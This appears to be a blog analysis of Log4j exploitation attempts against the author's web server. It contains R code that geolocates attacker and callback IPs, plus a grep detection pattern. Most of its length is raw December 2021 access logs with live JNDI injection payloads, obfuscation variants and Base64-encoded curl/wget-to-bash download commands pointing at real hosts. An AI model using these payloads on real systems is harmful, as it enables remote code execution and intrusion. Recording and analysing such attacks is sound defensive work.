|
|
Analysis Tech Art Repositories | |||||||
Separating this out into it's own section because I will be constantly updating as more logs come in. For more detailed Log4j analysis please see:
https://bcable.net/analysis-httpd-log4j_obfuscate.html
https://bcable.net/analysis-httpd-log4j_ircc2c.html
https://bcable.net/x/Rrdap https://bcable.net/x/Rwhois
library(Rrdap)
library(Rwhois)
library(rgeolocate)
https://bcable.net/x/Rproj/shared
source("shared/cleanup_logs.R")
source("shared/country_code_cleanup.R")
source("shared/geoip.R")
source("shared/load_varlog.R")
source("shared/parse_rawsplit.R")
source("shared/themes.R")
source("shared/world_mapper.R")
site_name <- "bcable.net"
httpd_data <- load_varlog(".", "log4j_httpd.txt")
httpd_data <- raw_populate(httpd_data)
httpd_data <- cleanup_httpd(httpd_data, geoip=FALSE)
attack_df <- read.csv("attack_ip.csv")
beacon_servers <- read.csv("beacon_servers.csv")
Start with Rrdap, Rwhois, and rgeolocate data.
ret <- geoip(beacon_servers$IP.Address, "country_code")
beacon_servers$rgeolocate <- ret$country_code
ret <- geoip(attack_df$IP.Address, "country_code")
attack_df$rgeolocate <- ret$country_code
attack_rdap_ret <- Rrdap::rdap_query(attack_df$IP.Address)
## [1] "Error (RDAP Query URI: https://rdap-bootstrap.arin.net/bootstrap/ip/163.172.54.124)"
## <simpleError in readLines(curl_con, warn = FALSE): OpenSSL SSL_connect: Connection reset by peer in connection to rdap.db.ripe.net:443 >
attack_df$Rrdap <- Rrdap::rdap_keyextract(attack_rdap_ret, "country")
beacon_rdap_ret <- Rrdap::rdap_query(beacon_servers$IP.Address)
beacon_servers$Rrdap <- Rrdap::rdap_keyextract(beacon_rdap_ret, "country")
attack_whois_ret <- Rwhois::whois_query(attack_df$IP.Address)
attack_df$Rwhois <- Rwhois::whois_keyextract(attack_whois_ret, "country")
beacon_whois_ret <- Rwhois::whois_query(beacon_servers$IP.Address)
beacon_servers$Rwhois <- Rwhois::whois_keyextract(beacon_whois_ret, "country")
Use RDAP data, fill in the games with rgeolocate data, then fall back on WHOIS data.
attack_df$Rwhois <- sub(" # .*", "", attack_df$Rwhois)
attack_df$Rwhois[nchar(attack_df$Rwhois)!=2] <- NA
attack_df$Country.Code <- attack_df$Rrdap
attack_df$Country.Code[is.na(attack_df$Country.Code)] <-
attack_df$rgeolocate[is.na(attack_df$Country.Code)]
attack_df$Country.Code[is.na(attack_df$Country.Code)] <-
attack_df$Rwhois[is.na(attack_df$Country.Code)]
beacon_servers$Rwhois <- sub(" # .*", "", beacon_servers$Rwhois)
beacon_servers$Rwhois[nchar(beacon_servers$Rwhois)!=2] <- NA
beacon_servers$Country.Code <- beacon_servers$Rrdap
beacon_servers$Country.Code[is.na(beacon_servers$Country.Code)] <-
beacon_servers$rgeolocate[is.na(beacon_servers$Country.Code)]
beacon_servers$Country.Code[is.na(beacon_servers$Country.Code)] <-
beacon_servers$Rwhois[is.na(beacon_servers$Country.Code)]
attack_df
## Count IP.Address rgeolocate Rrdap Rwhois Country.Code
## 1 2 1.116.59.211 CN CN CN CN
## 2 5 5.157.38.50 SE IS IS IS
## 3 4 15.236.146.246 US <NA> US US
## 4 1 18.221.182.245 US <NA> US US
## 5 2 34.74.41.34 US <NA> US US
## 6 2 34.80.118.173 US <NA> US US
## 7 2 36.138.125.108 CN CN CN CN
## 8 1 45.137.21.9 <NA> NL NL NL
## 9 5 45.146.164.160 <NA> RU NL RU
## 10 2 45.146.165.168 <NA> RU NL RU
## 11 9 45.155.205.233 <NA> RU NL RU
## 12 1 45.56.80.11 US <NA> US US
## 13 1 45.83.64.35 <NA> DE NL DE
## 14 1 45.83.65.44 <NA> DE NL DE
## 15 1 45.83.66.20 <NA> DE NL DE
## 16 1 45.83.66.82 <NA> DE NL DE
## 17 2 47.241.208.155 US <NA> US US
## 18 1 51.105.55.17 GB GB GB GB
## 19 2 62.76.41.46 RU RU RU RU
## 20 1 66.249.66.198 US <NA> US US
## 21 1 66.249.66.30 US <NA> US US
## 22 1 68.183.54.220 US <NA> US US
## 23 4 69.49.235.93 US <NA> US US
## 24 3 95.173.156.193 RU RU RU RU
## 25 44 95.214.235.219 <NA> UA UA UA
## 26 3 98.0.242.10 US <NA> US US
## 27 2 107.170.69.93 US <NA> US US
## 28 1 107.189.29.181 US <NA> US US
## 29 2 107.77.106.122 US <NA> US US
## 30 2 107.77.106.132 US <NA> US US
## 31 2 107.77.106.17 US <NA> US US
## 32 2 107.77.106.23 US <NA> US US
## 33 2 107.77.106.25 US <NA> US US
## 34 2 107.77.106.35 US <NA> US US
## 35 2 107.77.106.58 US <NA> US US
## 36 2 107.77.106.77 US <NA> US US
## 37 2 107.77.106.81 US <NA> US US
## 38 2 107.77.223.116 US <NA> US US
## 39 2 107.77.223.226 US <NA> US US
## 40 2 107.77.223.53 US <NA> US US
## 41 2 107.77.224.150 US <NA> US US
## 42 2 107.77.224.190 US <NA> US US
## 43 2 107.77.224.5 US <NA> US US
## 44 2 107.77.224.51 US <NA> US US
## 45 2 107.77.224.99 US <NA> US US
## 46 4 107.77.225.225 US <NA> US US
## 47 2 107.77.226.118 US <NA> US US
## 48 2 107.77.226.123 US <NA> US US
## 49 2 107.77.226.14 US <NA> US US
## 50 2 107.77.226.150 US <NA> US US
## 51 2 107.77.226.152 US <NA> US US
## 52 2 107.77.226.231 US <NA> US US
## 53 2 107.77.226.8 US <NA> US US
## 54 2 107.77.226.82 US <NA> US US
## 55 2 107.77.226.9 US <NA> US US
## 56 2 107.77.70.119 US <NA> US US
## 57 2 107.77.70.124 US <NA> US US
## 58 2 107.77.70.128 US <NA> US US
## 59 2 107.77.76.115 US <NA> US US
## 60 2 107.77.76.17 US <NA> US US
## 61 2 107.77.76.34 US <NA> US US
## 62 2 107.77.76.77 US <NA> US US
## 63 2 107.77.76.94 US <NA> US US
## 64 2 109.237.96.124 RU GB GB GB
## 65 2 121.4.56.143 CN CN CN CN
## 66 2 128.90.61.199 SA <NA> US SA
## 67 3 137.184.104.73 US <NA> US US
## 68 2 137.184.218.211 US <NA> US US
## 69 2 138.197.193.220 US <NA> US US
## 70 5 138.197.72.76 US <NA> US US
## 71 3 139.59.70.139 IN IN AU IN
## 72 1 143.198.71.190 US <NA> US US
## 73 1 143.244.156.104 US <NA> US US
## 74 1 144.21.52.153 US US NL US
## 75 1 147.182.202.30 US <NA> US US
## 76 4 150.158.95.54 BE CN CN CN
## 77 1 157.245.108.125 US <NA> US US
## 78 1 159.223.171.171 US <NA> US US
## 79 5 162.241.114.189 US <NA> US US
## 80 2 163.172.54.124 FR <NA> AU FR
## 81 2 164.52.53.163 HK HK AU HK
## 82 1 164.90.239.160 US <NA> US US
## 83 2 165.232.155.141 US <NA> US US
## 84 4 166.137.252.110 US <NA> US US
## 85 3 167.172.44.255 GB US NL US
## 86 2 167.71.13.196 US <NA> US US
## 87 3 167.71.175.10 US <NA> US US
## 88 6 170.210.45.163 AR <NA> UY AR
## 89 1 171.25.193.77 SE SE AU SE
## 90 1 172.104.152.7 DE <NA> US DE
## 91 1 172.111.36.142 US <NA> CA US
## 92 4 178.176.202.121 RU RU RU RU
## 93 5 178.176.203.190 RU RU RU RU
## 94 2 185.184.152.140 GB GB GB GB
## 95 1 185.220.101.156 DE US US US
## 96 1 185.220.101.191 DE US US US
## 97 2 185.220.101.23 DE DE DE DE
## 98 1 191.232.38.25 BR BR <NA> BR
## 99 5 194.163.179.92 DE DE DE DE
## 100 1 194.233.164.95 DE GB GB GB
## 101 3 194.48.199.78 AT GB GB GB
## 102 60 195.54.160.149 <NA> RU RU RU
## 103 2 199.127.60.104 US <NA> US US
## 104 1 199.195.250.77 US <NA> US US
## 105 2 207.244.248.240 US <NA> US US
## 106 1 209.141.47.28 US <NA> US US
## 107 2 211.154.194.21 CN CN CN CN
beacon_servers
## Count IP.Address rgeolocate Rrdap Rwhois Country.Code
## 1 5 2.58.149.206 <NA> NL NL NL
## 2 2 5.181.80.103 <NA> BG BG BG
## 3 1 13.78.223.142 US <NA> US US
## 4 13 31.131.16.127 UA UA UA UA
## 5 2 45.12.32.14 <NA> NL NL NL
## 6 1 45.130.229.168 <NA> SG NL SG
## 7 1 45.137.21.9 <NA> NL NL NL
## 8 1 45.139.100.173 <NA> IR NL IR
## 9 5 45.146.164.160 <NA> RU NL RU
## 10 2 45.146.165.168 <NA> RU NL RU
## 11 9 45.155.205.233 <NA> RU NL RU
## 12 3 45.83.193.150 <NA> NL NL NL
## 13 4 45.83.64.1 <NA> DE NL DE
## 14 1 50.116.41.48 US <NA> US US
## 15 1 51.79.240.74 GB <NA> EU GB
## 16 3 103.104.73.155 <NA> IN IN IN
## 17 1 107.181.187.184 US <NA> US US
## 18 10 121.140.99.236 KR KR KR KR
## 19 2 128.90.61.199 SA <NA> US SA
## 20 1 135.148.130.60 US <NA> US US
## 21 2 135.148.132.224 US <NA> US US
## 22 2 137.184.40.48 US <NA> US US
## 23 6 142.93.172.227 CA <NA> US CA
## 24 1 143.198.109.43 US <NA> US US
## 25 4 159.223.5.30 US <NA> US US
## 26 9 162.241.127.99 US <NA> US US
## 27 1 162.55.90.26 US DE NL DE
## 28 3 167.172.44.255 GB US NL US
## 29 1 167.71.13.196 US <NA> US US
## 30 1 167.99.32.139 US <NA> US US
## 31 1 172.104.152.7 DE <NA> US DE
## 32 1 179.43.175.101 CH <NA> PA CH
## 33 16 185.246.87.50 <NA> FR FR FR
## 34 1 191.232.194.71 BR BR <NA> BR
## 35 1 192.3.194.202 US <NA> US US
## 36 1 193.3.19.159 DK RU RU RU
## 37 4 194.40.243.149 <NA> NL NL NL
## 38 60 195.54.160.149 <NA> RU RU RU
## 39 1 205.185.115.217 US <NA> US US
log4j <- rep(attack_df$Country.Code, attack_df$Count)
g <- world_mapper(country_code_cleanup(log4j))
g <- g + labs(
title=paste0(site_name,
": Log4j Exploit Attempts (Attack Servers)", collapse=""
), fill="Attempts", x="", y=""
)
g <- g + scale_fill_continuous(low="#300000", high="#E00000", guide="colorbar")
g <- g + theme_worldfont()
g
log4j <- rep(beacon_servers$Country.Code, beacon_servers$Count)
g <- world_mapper(country_code_cleanup(log4j))
g <- g + labs(
title=paste0(site_name,
": Log4j Exploit Callbacks (Beacon Servers)", collapse=""
), fill="Attempts", x="", y=""
)
g <- g + scale_fill_continuous(low="#300000", high="#E00000", guide="colorbar")
g <- g + theme_worldfont()
g
httpd_data$Date <- as.POSIXct(httpd_data$Date)
g <- ggplot(httpd_data, aes(x=Date))
g <- g + labs(x="", y="Attacks", title=paste0(
c(site_name, ": Log4j Attack Attempts"),
collapse=""
))
g <- g + geom_histogram(bins=50)
g <- g + theme_bw() %+replace% theme_fontfix()
g
Because of the nature of the string bypasses, the best generic Bash command I could come up with while filtering for some other attacks in my logs was the following:
grep -shE "\\$.*j.*n.*d.*i" ssl_access_log-20211* access_log-20211* ssl_access_log-202[2-9]* access_log-202[2-9]* access_log ssl_access_log | grep -v "new%20java" | grep -v "\$(wget"
This produced the following raw logs up until approximately “Sun Jan 23 10:29:17 PM CST 2022”.
171.25.193.77 - - [10/Dec/2021:12:35:50 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://298ae5ae41e3.bingsearchlib.com:39356/a}"
45.155.205.233 - - [10/Dec/2021:13:08:43 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
45.155.205.233 - - [10/Dec/2021:13:08:44 +0000] "GET / HTTP/1.1" 200 5382 "http://50.116.41.48:80/" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
45.155.205.233 - - [10/Dec/2021:14:29:22 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
45.155.205.233 - - [10/Dec/2021:18:04:08 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
45.155.205.233 - - [10/Dec/2021:18:04:08 +0000] "GET / HTTP/1.1" 200 5382 "http://50.116.41.48:80/" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
45.155.205.233 - - [10/Dec/2021:18:54:27 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
167.71.13.196 - - [10/Dec/2021:21:51:23 +0000] "GET /$%7Bjndi:ldaps://cae70be.probe001.log4j.leakix.net:8443/b%7D?${jndi:ldaps://cae70be.probe001.log4j.leakix.net:8443/b}=${jndi:ldaps://cae70be.probe001.log4j.leakix.net:8443/b} HTTP/1.1" 404 253 "-" "${jndi:ldaps://cae70be.probe001.log4j.leakix.net:8443/b}"
45.137.21.9 - - [11/Dec/2021:02:50:35 +0000] "POST / HTTP/1.1" 302 203 "-" "${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==}"
191.232.38.25 - - [11/Dec/2021:10:25:55 +0000] "GET /${jndi:ldap://45.130.229.168:1389/Exploit} HTTP/1.1" 404 239 "-" "curl/7.58.0"
185.220.101.156 - - [11/Dec/2021:13:51:31 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://205.185.115.217:47324/a}"
137.184.104.73 - - [11/Dec/2021:17:14:09 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}"
137.184.104.73 - - [11/Dec/2021:17:14:09 +0000] "GET / HTTP/1.1" 200 5382 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}"
137.184.104.73 - - [11/Dec/2021:17:14:10 +0000] "GET /favicon.ico HTTP/1.1" 200 39662 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}"
138.197.72.76 - - [11/Dec/2021:17:47:10 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent}"
138.197.72.76 - - [11/Dec/2021:19:24:39 +0000] "GET /$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D HTTP/1.1" 404 267 "-" "Kryptos Logic Telltale"
194.48.199.78 - - [11/Dec/2021:20:51:19 +0000] "GET /?x=${jndi:ldap://${hostName}.c6qg2lspu892jo716f40cg4tyiyy4mhgr.interactsh.com/a} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6qg2lspu892jo716f40cg4tyiyy4mhge.interactsh.com}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qg2lspu892jo716f40cg4tyiyy4mhgg.interactsh.com}"
138.197.72.76 - - [11/Dec/2021:23:47:38 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"
138.197.72.76 - - [12/Dec/2021:01:05:22 +0000] "GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 302 276 "-" "Kryptos Logic Telltale"
138.197.72.76 - - [12/Dec/2021:01:05:22 +0000] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 265 "http://50.116.41.48/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale"
45.155.205.233 - - [12/Dec/2021:04:55:06 +0000] "GET /?x=${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
45.155.205.233 - - [12/Dec/2021:04:55:07 +0000] "GET /?x=$%7bjndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
45.155.205.233 - - [12/Dec/2021:05:44:24 +0000] "GET /?x=${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
51.105.55.17 - - [12/Dec/2021:17:36:45 +0000] "GET /$%7Bjndi:ldap://45.83.193.150:1389/Exploit%7D HTTP/1.1" 404 238 "-" "Mozilla/5.0 zgrab/0.x"
45.83.64.35 - - [13/Dec/2021:02:01:59 +0000] "GET /$%7Bjndi:dns://45.83.64.1/securityscan-https443%7D HTTP/1.1" 400 226 "${jndi:dns://45.83.64.1/securityscan-https443}" "${jndi:dns://45.83.64.1/securityscan-https443}"
45.146.164.160 - - [13/Dec/2021:02:48:45 +0000] "GET / HTTP/1.1" 200 96 "-" "${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//45.146.164.160:8081/w}"
45.83.65.44 - - [13/Dec/2021:03:58:16 +0000] "GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 302 252 "${jndi:dns://45.83.64.1/securityscan-http80}" "${jndi:dns://45.83.64.1/securityscan-http80}"
138.197.193.220 - - [13/Dec/2021:04:41:07 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}"
138.197.193.220 - - [13/Dec/2021:04:41:07 +0000] "GET /favicon.ico HTTP/1.1" 200 39662 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}"
195.54.160.149 - - [13/Dec/2021:04:57:52 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [13/Dec/2021:04:57:52 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
167.172.44.255 - - [13/Dec/2021:16:59:57 +0000] "GET / HTTP/1.0" 301 225 "-" "borchuk/3.1 ${jndi:ldap://167.172.44.255:389/LegitimateJavaClass}"
167.172.44.255 - - [13/Dec/2021:17:37:52 +0000] "GET / HTTP/1.0" 301 225 "-" "borchuk/3.1 ${jndi:ldap://167.172.44.255:389/LegitimateJavaClass}"
45.146.164.160 - - [13/Dec/2021:20:11:53 +0000] "GET / HTTP/1.1" 200 96 "-" "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164.160:1389/t}"
45.146.164.160 - - [13/Dec/2021:20:11:53 +0000] "GET / HTTP/1.1" 200 96 "-" "${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164.160:1389/t}"
45.146.164.160 - - [13/Dec/2021:20:11:54 +0000] "GET / HTTP/1.1" 200 96 "-" "${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}"
45.146.164.160 - - [13/Dec/2021:20:11:54 +0000] "GET / HTTP/1.1" 200 96 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}"
194.48.199.78 - - [13/Dec/2021:21:45:55 +0000] "GET /?x=${jndi:ldap://${hostName}.c6rr05cpu892m69lgpo0cg5hygobm6q9o.interact.sh/a} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rr05cpu892m69lgpo0cg5hygobm6q9w.interact.sh}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rr05cpu892m69lgpo0cg5hygobm6q91.interact.sh}"
195.54.160.149 - - [14/Dec/2021:01:36:08 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [14/Dec/2021:01:36:08 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
167.172.44.255 - - [14/Dec/2021:01:50:19 +0000] "GET / HTTP/1.0" 301 225 "${jndi:ldap://167.172.44.255:1389/Lazn}" "borchuk/3.1 ${jndi:ldap://167.172.44.255:1389/Lazn}"
194.48.199.78 - - [14/Dec/2021:12:14:13 +0000] "GET / HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://107.181.187.184:83/appel.sh}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://107.181.187.184:83/appel.sh}"
128.90.61.199 - - [14/Dec/2021:13:42:09 +0000] "GET /$%7Bjndi:iiop://128.90.61.199:5456/1639489266%7D HTTP/1.1" 404 241 "${jndi:iiop://128.90.61.199:5456/1639489266}" "${jndi:iiop://128.90.61.199:5456/1639489266}"
